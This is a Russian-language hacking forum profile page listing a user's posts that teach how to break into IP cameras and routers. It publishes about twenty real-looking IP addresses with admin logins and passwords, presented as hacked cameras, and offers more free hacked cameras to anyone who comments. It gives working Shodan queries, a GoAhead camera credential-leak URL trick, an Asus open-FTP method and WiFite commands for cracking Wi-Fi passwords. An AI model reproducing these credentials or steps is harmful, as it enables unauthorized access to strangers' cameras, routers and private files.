DJ1N
НЕ ПРОВЕРЕН ? НЕ ПРОВЕРЕН ?-
Content Count
9 -
Joined
-
Last visited
-
Days Won
4 -
Time Online
3д 2ч 51м 17с
My Favorite Songs
DJ1N last won the day on May 13
DJ1N had the most liked content!
Дополнительная информация
-
Регион
KK
-
Квалификация
Хакер
Торговая информация
- Сделок: 0 Сделок: 0
- Депозит: 0 Депозит: 0
Recent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
-
Serz reacted to a post in a topic: Взлом камер
-
İbra_12 reacted to a post in a topic: Взлом камер
-
Всем пмривет я вас научу взлому камер и роултеров. Для этого необходимо собрать 100 коментариев под этим постом. Каждому кто подпишится буду скидывать халявные 5 взломанных камер(ip/login/password).
-
Alex989 reacted to a post in a topic: Научу взлому камер и роултеров
-
Hello my devils. Here's a list of cameras. 1. 89.155.77.140 Ip camera admin 1234 2. 84.195.9.164 WiFi-r admin 1234 3. 203.204.56.29 WiFi- r admin 1234 4. 101.3.112.49 WiFi- r admin 1111 5. 112.105.8.59 WiFi- r admin 1234 6. 113.61.130.37 WiFi- r admin 1234 7. 112.105.61.27 (Wi-Fi Protected Setup) admin 1234 8. 88.199.53.30 Точка доступа admin 1234 9. 106.107.217.117 Wifi-r admin 1234 10. 75.188.225.133 Точка доступа admin 1234 11. 93.91.51.95:83 Ip-camera koleso77 77martin77 12. 106.107.160.234 Wi-Fi-r admin 1234 13. 159.118.73.64 Wifi-r admin 1234 14. 1.64.75.201 Wfi-r admin 1234 15. 134.19.173.164 Wi-Fi-r admin 1234 16. 179.8.11.253:81 Camera admin 1234 17. 70.114.97.224:81 Camera admin 18. 74.78.96.5:81 Camera admin Snow1344 19. 84.220.18.170:81 Camera admin 15477281 20. 92.116.164.197:81 Camera admin Iguana1965
-
К интернету подключено множество устройств с дефолтными логинами и паролями, вот именно они нам и интересны . Для этого в строке поиска пишем «default+password». Добавим также port:80, чтобы выбрать устройства с www-аутентификацией. В результате мы увидим множество баннеров, содержащих искомую фразу, и, как показывает практика, большой процент устройств будут иметь логин/пароль вида admin/password, admin/pass.(зачистую admin и 1234) Все действия делаются строго с vpn в поисковом сервисе shodan. Как взламывать камеры рассказывал в других статьях.
-
Взлом роутеров Asus в Shodan Нас сейчас интересуют роутеры Asus, которые имеют уязвимость, что бы найти эти устройства в сети, достаточно вбить в поисковике следующий запрос: «asus 230 port:”21″» Так же можно добавить разные параметры, например: country:”RU” City — поиск в определенном городе: apache city:"Paris" Далее, берем любой IP который выдал нам поисковик Shodan, копируем его, а затем достаточно в том же браузере (в адресной строке), написать “ftp://” и вставить тот самый IP адрес, который мы копировали чуть ранее. В итоге мы получаем доступ к файлам через ftp, далее, можно следовать что имеется в наличии. Таким образом можно найти множества интересной информации: И все эти файлы находятся в свободном доступе, а это могут быть фотографии, документы и так далее. И если данная информация попадет не в те руки, могут быть последствия.
-
Справка по WiFite опциональные аргументы: -h, --help показать справку и выйти НАСТРОЙКИ: -i [interface] Беспроводной интерфейс для использования (по умолчанию: спрашивать) -c [channel] Беспроводные каналы для сканирования (по умолчанию: все каналы) -5, --5ghz Включая 5Ghz каналы (по умолчанию: выключено) -b [bssid] BSSID (например, AA:BB:CC:DD:EE:FF) точки доступа для атаки -e [essid] ESSID (имя) точки доступа для атаки -v, --verbose Вербальный режим, печатать все строки (по умолчанию: тихий) WEP: --wep Показывать только сети с шифрованием WEP (по умолчанию: выключено) --require-fakeauth Атака не удалась, если не удалась фальшивая аутентификация (по умолчанию: выключено) --pps [pps] Пакетов в секунду для восроизведения (по умолчанию: 600 pps) --wept [секунды] Ожидать секунд перед неудачей (по умолчанию: 600 секунд) --wepca [ivs] Запустить взлом на этом количестве IVs (по умолчанию: 10000 ivs) --weprs [секунды] Перезапустить aireplay если не появляются новые IVs (по умолчанию: 11 секунд) --weprc [секунды] Перезапустить aircrack после этой задержки (по умолчанию: 30 секунд) --arpreplay Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено) --fragment Использовать атаку WEP фрагментации (по умолчанию: включено) --chopchop Использовать WEP атаку чоп-чоп (по умолчанию: включено) --caffelatte Использовать WEP атаку Кафе латте (по умолчанию: включено) --p0841 Использовать WEP атаку p0841 (по умолчанию: включено) --hirte Использовать WEP атаку ARP-воспроизведения (по умолчанию: включено) WPA: --wpa Показывать только сети с WPA шифрованием (включая WPS) --wpadt [секунды] Время ожидания перед отправкой деаутентификации (по умолчанию: 10 секунд) --wpat [секунды] Время ожидания, чтобыб признать атаку WPA неудачной (по умолчанию: 500 секунд) --hs-dir [dir] Директория для сохранения рукопожатий files (по умолчанию: hs) --dict [файл] Файл, содержащий пароли для взлома (по умолчанию: None) --strip Очистить ненужные пакеты из захваченного рукопожатия используя tshark или pyrit WPS: --wps Показывать только сети с WPS --reaver Использовать ТОЛЬКО Reaver на WPS сетях (по умолчанию: выключено) --no-reaver НЕ использовать Reaver на WPS сетях (по умолчанию: выключено) --pixie Использовать только атаку WPS Pixie-Dust (по умолчанию: выключено) --pixiet [секунды] Время ожидания перед признанием атаки PixieDust неудачной (по умолчанию: 300 секунд) --pixiest [секунды] Время ожидания для шага прогресса перед признанием атаки PixieDust неудачной (по умолчанию: 30 секунд) --wpst [секунды] Время ожидания перед признанием атаки WPS PIN неудачной (по умолчанию: 600 секунд) --wpsmr [попытки] Максимальное количество попыток перед признанием неудачи (по умолчанию: 20) --wpsmf [fails] Максимальное число неудач Reaver перед признанием атаки провалившейся (по умолчанию: 30) --wpsmt [timeouts] Максимальное количество таймаутов перед остановкой (по умолчанию: 30) --ignore-ratelimit Игнорировать атаку, если WPS ограничен по скорости (по умолчанию: включено) КОМАНДЫ: --cracked Показать ранее взломанные точки доступа Как запустить WiFite 1. ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up 2. cp /usr/share/wordlists/rockyou.txt.gz . 3. gunzip rockyou.txt.gz 4. cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt Установка 1. git clone https://github.com/derv82/wifite2.git 2. cd wifite2/ 3. sudo ./Wifite.py --help Скачиваем из интернета брут словарь. Дальше вводим данный скрипт: wifite --dict home/ваш аккаунт/Загрузки/дириктория папки с поролями или sudo wifite --crack --dict ~/newrockyou.txt --all (отака на все точки сети) После того как вы введете этот скрипт у вас появится данная картинка: Нам нужно нажать ctrl-c и выбрать номер сети. Далее программа начинае подбор и при успешном подборе сохраняет его в папке.
-
DJ1N started following Легкий способ взлома камеры, Взлом роутеров Asus в Shodan and Взлом Роултеров и Ip-распредилителей
-
Гарант Даркнет reacted to a post in a topic: Взлом Роултеров и Ip-распредилителей
-
К интернету подключено множество устройств с дефолтными логинами и паролями, вот именно они нам и интересны . Для этого в строке поиска пишем «default+password». Добавим также port:80, чтобы выбрать устройства с www-аутентификацией. В результате мы увидим множество баннеров, содержащих искомую фразу, и, как показывает практика, большой процент устройств будут иметь логин/пароль вида admin/password, admin/pass.(зачистую admin и 1234) Все действия делаются строго с vpn в поисковом сервисе shodan. Как взламывать камеры рассказывал в других статьях.
-
STALKER78 reacted to a post in a topic: Легкий способ взлома камеры
-
И так начнем с того, что такое Shodan: Shodan — это первая (и, пожалуй, ведущая) поисковая система по Интернету вещей, существующая уже более семи лет. Shodan назвали в честь главного злодея (точнее, злодейки) в серии компьютерных игр System Shock — в игре это был крайне злобный искусственный интеллект. Конечно, эта поисковая система не настолько безжалостна, как ее прототип, но и она способна причинить немало вреда. Заходим в поисковик Shodan Регамся (порядка 2 минут). Далее вводим в поисковую страку<realm="GoAhead", domain=":81" port:81> Нам видно множество разных Ip камер. Заходим на любой из них (нужно нажать на квадратик со стрелочкой). Нас просят ввести логин и пороль, но нам это пока, что не инетересно. Нам нужно ввести в адресную строку после ip камеры данную комбинацию</system.ini?loginuse&loginpas> Как только мы это ввели, в загрузки должен прилететь файл с логином и поролем от камеры. Если вам понравилась статья прошу оставить отзыв и подписаться)
-
DJ1N started following Взлом камер
-
И так начнем с того, что такое Shodan: Shodan — это первая (и, пожалуй, ведущая) поисковая система по Интернету вещей, существующая уже более семи лет. Shodan назвали в честь главного злодея (точнее, злодейки) в серии компьютерных игр System Shock — в игре это был крайне злобный искусственный интеллект. Конечно, эта поисковая система не настолько безжалостна, как ее прототип, но и она способна причинить немало вреда. 1. Заходим в поисковик Shodan 2. Регамся (порядка 2 минут). 3.Далее вводим в поисковую страку <realm="GoAhead", domain=":81" port:81> Нам видно множество разных Ip камер. 4.Заходим на любой из них (нужно нажать на квадратик со стрелочкой). Нас просят ввести логин и пороль, но нам это пока, что не инетересно. 5. Нам нужно ввести в адресную строку после ip камеры данную комбинацию</system.ini?loginuse&loginpas> Как только мы это ввели, в загрузки должен прилететь файл со скриптом где есть с логин и пороль от камеры. 6. Обновляем страницу с входом в камеру и вводим логин и пароль. Если вам понравилась публикация, прошу оставить комент и подписаться.
-
Black Shark started following DJ1N
-
Кто хочет научится взламывать камеры и роултеры оставляйте коменты. За потписку отдам халявные 5 взломанных камер каждому пользователю.